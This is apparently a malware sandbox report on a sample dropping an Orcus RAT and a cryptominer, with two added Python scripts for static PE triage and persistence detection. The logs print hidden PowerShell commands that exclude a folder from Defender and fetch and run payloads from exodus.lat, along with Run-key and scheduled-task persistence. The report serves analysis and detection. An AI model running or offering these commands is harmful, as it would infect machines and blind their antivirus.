Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Shared.Utilities\obj\Release\Orcus.Shared.Utilities.pdb source: RegAsm.exe, 00000016.00000002.4640471488.0000000005A40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Shared\obj\Release\Orcus.Shared.pdb source: RegAsm.exe, 00000016.00000002.4626770103.0000000005130000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\zack3r\Desktop\Orcus.Plugins.ADE\Orcus.Plugins.BsodProtection-master\Source\obj\Debug\BsodProtection.pdb8*R* D*_CorDllMainmscoree.dll source: RegAsm.exe, 00000016.00000002.4641342536.0000000005A80000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: costura.orcus.plugins.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: smartscreen.exe.22.dr, AssemblyLoader.cs | .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: COMSurrogate.exe.38.dr, AssemblyLoader.cs | .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
Source: Yara match | File source: 47.0.COMSurrogate.exe.1ee64180000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.0.smartscreen.exe.1eb2ab20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.RegAsm.exe.3c9d977.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.RegAsm.exe.3c9d977.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.RegAsm.exe.3c7491a.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.RegAsm.exe.3c7491a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000032.00000002.4565651226.0000021642F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000037.00000002.4566695155.000002748FD21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.4565494964.000001EB2C781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000000.3929689424.000001EE64182000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match | File source: 00000035.00000002.4566717122.000001F78A821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000036.00000002.4565336493.0000021535001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.4566859084.000001EE65D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000000.3856204224.000001EB2AB22000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.4603685340.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: smartscreen.exe PID: 2488, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\smartscreen.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe, type: DROPPED
Source: smartscreen.exe.22.dr | Static PE information: compile timestamp 0xA67CE10C [Sat Jul 6 17:25:32 2058 UTC] (lies in the future)
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress | 0_2_00406328
Source: DM6vAAgoCw.exe | Static PE information: real checksum: 0x6ed3f5 should be: 0x6fd4a7
Source: mi.exe.47.dr | Static PE information: real checksum: 0x0 should be: 0x6280f4
Source: COMSurrogate.exe.38.dr | Static PE information: real checksum: 0x0 should be: 0x31fa2
Source: smartscreen.exe.22.dr | Static PE information: real checksum: 0x0 should be: 0x3150c
Source: mi.exe.47.dr | Static PE information: section name: _RANDOMX
Source: mi.exe.47.dr | Static PE information: section name: _TEXT_CN
Source: mi.exe.47.dr | Static PE information: section name: _TEXT_CN
Source: mi.exe.47.dr | Static PE information: section name: _RDATA
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_00658B75 push ecx; ret 18_2_00658B88
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_0064CBF4 push eax; retf 18_2_0064CBF8
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_06DB4C60 push esp; ret 22_2_06DB4C61
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | Code function: 22_2_06DB59F2 push eax; retf 22_2_06DB59F9
Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe | Code function: 31_2_00007FFD348A00BD pushad ; iretd 31_2_00007FFD348A00C1
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Code function: 47_2_00007FFD348900BD pushad ; iretd 47_2_00007FFD348900C1
Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe | Code function: 50_2_00007FFD348900BD pushad ; iretd 50_2_00007FFD348900C1
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Code function: 53_2_00007FFD348B00BD pushad ; iretd 53_2_00007FFD348B00C1
Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe | Code function: 54_2_00007FFD348B00BD pushad ; iretd 54_2_00007FFD348B00C1
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Code function: 55_2_00007FFD348A00BD pushad ; iretd 55_2_00007FFD348A00C1
Source: smartscreen.exe.22.dr | Static PE information: section name: .text entropy: 7.948742985384125
Source: COMSurrogate.exe.38.dr | Static PE information: section name: .text entropy: 7.954562345775779
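The static findings above (a stored CheckSum of 0 that "should be" a computed value, a compile timestamp in 2058, the _RANDOMX and _TEXT_CN section names that XMRig builds carry, and .text entropy near 8) can all be reproduced from the PE headers without running anything. The script below is an added example, not Joe Sandbox code: it implements the Windows PE CheckSum algorithm, parses the section table, and applies the four checks to a minimal PE32+ that it builds in memory. That in-memory PE, its section contents and the 7.5 entropy threshold are assumptions of the example, not bytes from the sample.

```python
"""Static PE checks matching the report's findings: header CheckSum recomputed
("real checksum: 0x0 should be: ..."), compile timestamp in the future (0xA67CE10C,
year 2058), XMRig section names and packed-section entropy. Added example, not Joe
Sandbox code; the PE below is built in memory and its values are assumptions."""
import hashlib
import math
import struct
import time
from collections import Counter
from typing import List, Optional, Tuple

XMRIG_SECTION_NAMES = {b"_RANDOMX", b"_TEXT_CN"}
OPT_HDR_OFF, CHECKSUM_IN_OPT = 24, 64   # optional header follows "PE\0\0" + COFF; CheckSum is at +64 in PE32 and PE32+


def checksum_offset(data: bytes) -> int:
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + OPT_HDR_OFF + CHECKSUM_IN_OPT


def pe_checksum(data: bytes) -> int:
    """CheckSum as Windows computes it: 16-bit word sum with carries folded back in,
    skipping the CheckSum field itself, plus the file length. Summing aligned dwords
    with 32-bit carry folding gives the same value with half the iterations."""
    skip = checksum_offset(data) // 4
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def set_checksum(data: bytes, value: int) -> bytes:
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_offset(data), value)
    return bytes(buf)


def shannon_entropy(buf: bytes) -> float:
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0


def parse_pe(data: bytes) -> Tuple[int, int, List[Tuple[bytes, bytes]]]:
    """Return (TimeDateStamp, stored CheckSum, [(section name, raw bytes), ...])."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    n_sections, timestamp = struct.unpack_from("<HI", data, e_lfanew + 6)
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    stored = struct.unpack_from("<I", data, checksum_offset(data))[0]
    table = e_lfanew + OPT_HDR_OFF + opt_size
    sections = []
    for i in range(n_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        sections.append((name.rstrip(b"\x00"), data[raw_ptr:raw_ptr + raw_size]))
    return timestamp, stored, sections


def triage(data: bytes, now: Optional[int] = None) -> dict:
    """The four static flags; `now` is injectable so the timestamp check is testable."""
    now = int(time.time()) if now is None else now
    timestamp, stored, sections = parse_pe(data)
    computed = pe_checksum(data)
    return {
        "checksum_stored": stored,
        "checksum_computed": computed,
        "checksum_mismatch": stored != computed,
        "timestamp_in_future": timestamp > now,
        "xmrig_sections": sorted(n for n, _ in sections if n in XMRIG_SECTION_NAMES),
        "high_entropy_sections": sorted(n for n, raw in sections if shannon_entropy(raw) > 7.5),
    }


def build_sample_pe(timestamp: int, sections: List[Tuple[bytes, bytes]]) -> bytes:
    """Minimal PE32+ built in memory (constructed test input). Section bodies are padded
    to the 0x200 file alignment and CheckSum is left at 0, as seen on the dropped files."""
    align, opt_size = 0x200, 240
    raw_start = -(-(0x40 + 4 + 20 + opt_size + 40 * len(sections)) // align) * align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                            # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), timestamp, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)                               # PE32+ magic
    table, body, raw_ptr = b"", b"", raw_start
    for i, (name, payload) in enumerate(sections):
        payload += b"\x00" * (-len(payload) % align)
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\x00"), len(payload),
                             0x1000 * (i + 1), len(payload), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += payload
        raw_ptr += len(payload)
    head = bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + table
    return head + b"\x00" * (raw_start - len(head)) + body


# Constructed inputs: a SHA-256 chain stands in for a packed .text (entropy near 8, like
# the 7.95 reported above); _RANDOMX gets filler; the timestamp is the report's 0xA67CE10C.
PACKED = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(512))
SAMPLE = build_sample_pe(0xA67CE10C, [(b".text", PACKED), (b"_RANDOMX", b"A" * 4096)])

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A CheckSum of 0 is not malicious on its own (many unsigned builds leave it unset), but combined with a future timestamp and near-8 entropy in .text it is the profile of a rewritten or packed file rather than a normal linker output. On a real file, read it with `open(path, "rb").read()` and pass the bytes to `triage`; the CheckSum the script computes is the value the report prints after "should be".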

                                  Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | File created: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\491505\Dr.com
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | File created: C:\Users\user\AppData\Local\asm\WinRing0x64.sys
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\asm\COMSurrogate.exe
Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com | File created: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe | File created: C:\Users\user\AppData\Local\Temp\Commissioner
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | File created: C:\Users\user\AppData\Local\asm\mi.exe
Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\smartscreen.exe

                                  Boot Survival

Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SmartScreen
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run COM Surrogate
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
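The three persistence entries above (two HKCU Run values named after Windows components and a daily task that re-runs a JScript file every 3 minutes through wscript //B at the highest run level) are what the Sigma rules listed in the overview key on. The script below is an added example, not Joe Sandbox code or the Sigma rules themselves; it encodes those checks and runs them over records built from this section. The report shows only the Run value names and the process that wrote each one, so the target paths in the records assume each value points at the process that wrote it; the lists of system binary names, component names and user-writable folders are assumptions of the example, not an exhaustive allowlist.

```python
"""Checks on Run keys and scheduled tasks in the spirit of the Sigma rules this report
lists ("Files With System Process Name In Unsuspected Locations", "New RUN Key Pointing
to Suspicious Folder", "Suspicious Command Patterns In Scheduled Task Creation").
Added example, not Joe Sandbox code; the records and the name lists are assumptions."""
import re
from typing import Dict, List

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_BINARIES = {"smartscreen.exe", "dllhost.exe", "regasm.exe"}   # names this sample borrows
COMPONENT_NAMES = {"smartscreen", "com surrogate", "comsurrogate"}     # Windows component names
SCRIPT_HOSTS = {"wscript", "cscript", "mshta", "powershell"}
TN_RE = re.compile(r'/tn\s+"([^"]+)"', re.I)
TR_RE = re.compile(r'/tr\s+"([^"]+)"', re.I)

# Constructed from the report: two HKCU Run values (targets assumed to be the writers'
# own paths) and the schtasks command line as logged.
PERSISTENCE = [
    {"kind": "run_key", "name": "SmartScreen",
     "target": r"C:\Users\user\AppData\Local\Temp\smartscreen.exe"},
    {"kind": "run_key", "name": "COM Surrogate",
     "target": r"C:\Users\user\AppData\Local\asm\COMSurrogate.exe"},
    {"kind": "schtask", "command": r"""schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST"""},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_writable(text: str) -> bool:
    return any(marker in text.lower() for marker in USER_WRITABLE)


def check_run_key(rec: Dict) -> List[str]:
    target, name = rec["target"].lower(), basename(rec["target"])
    stem = name.rsplit(".", 1)[0]
    findings = []
    if in_user_writable(target):
        findings.append(f"Run value points into a user-writable folder: {rec['target']}")
    if name in SYSTEM_BINARIES and not target.startswith(SYSTEM_DIRS):
        findings.append(f"{name} is a System32 binary name but runs from {rec['target']}")
    if rec["name"].lower() in COMPONENT_NAMES or stem in COMPONENT_NAMES:
        findings.append(f"value name '{rec['name']}' impersonates a Windows component")
    return findings


def check_schtask(rec: Dict) -> List[str]:
    cmd = rec["command"]
    match = TR_RE.search(cmd)
    if not match:
        return []
    action = match.group(1)
    words = action.split()
    host = basename(words[0]).rsplit(".", 1)[0] if words else ""
    findings = []
    if host in SCRIPT_HOSTS:
        findings.append(f"task action runs a script host ({host}): {action}")
    if re.search(r"//B\b", action, re.I):
        findings.append("//B hides script errors from the user")
    if in_user_writable(action):
        findings.append("script lives in a user-writable folder")
    if re.search(r"/RL\s+HIGHEST", cmd, re.I):
        findings.append("task requests the highest run level")
    if re.search(r"/ri\s+\d+", cmd, re.I):
        findings.append("repetition interval re-launches the payload (watchdog pattern)")
    return findings


def triage(records: List[Dict]) -> Dict[str, List[str]]:
    """Map each persistence entry's label to its findings; clean entries are omitted."""
    report = {}
    for rec in records:
        if rec["kind"] == "run_key":
            label, findings = rec["name"], check_run_key(rec)
        else:
            match = TN_RE.search(rec["command"])
            label = match.group(1) if match else "<unnamed task>"
            findings = check_schtask(rec)
        if findings:
            report[label] = findings
    return report


if __name__ == "__main__":
    for label, findings in triage(PERSISTENCE).items():
        print(label, *findings, sep="\n  ")
```

On a live host the same records come from `HKCU\...\CurrentVersion\Run` (value name and data) and from the task XML under `C:\Windows\System32\Tasks`, where the action and the `/RL HIGHEST` setting appear as `<Exec>` and `<RunLevel>HighestAvailable</RunLevel>`; note that a task created from a non-elevated process still registers, it simply runs with whatever the user has.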

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006B59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,18_2_006B59B3
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00645EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,18_2_00645EDA
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006533B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,18_2_006533B7
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
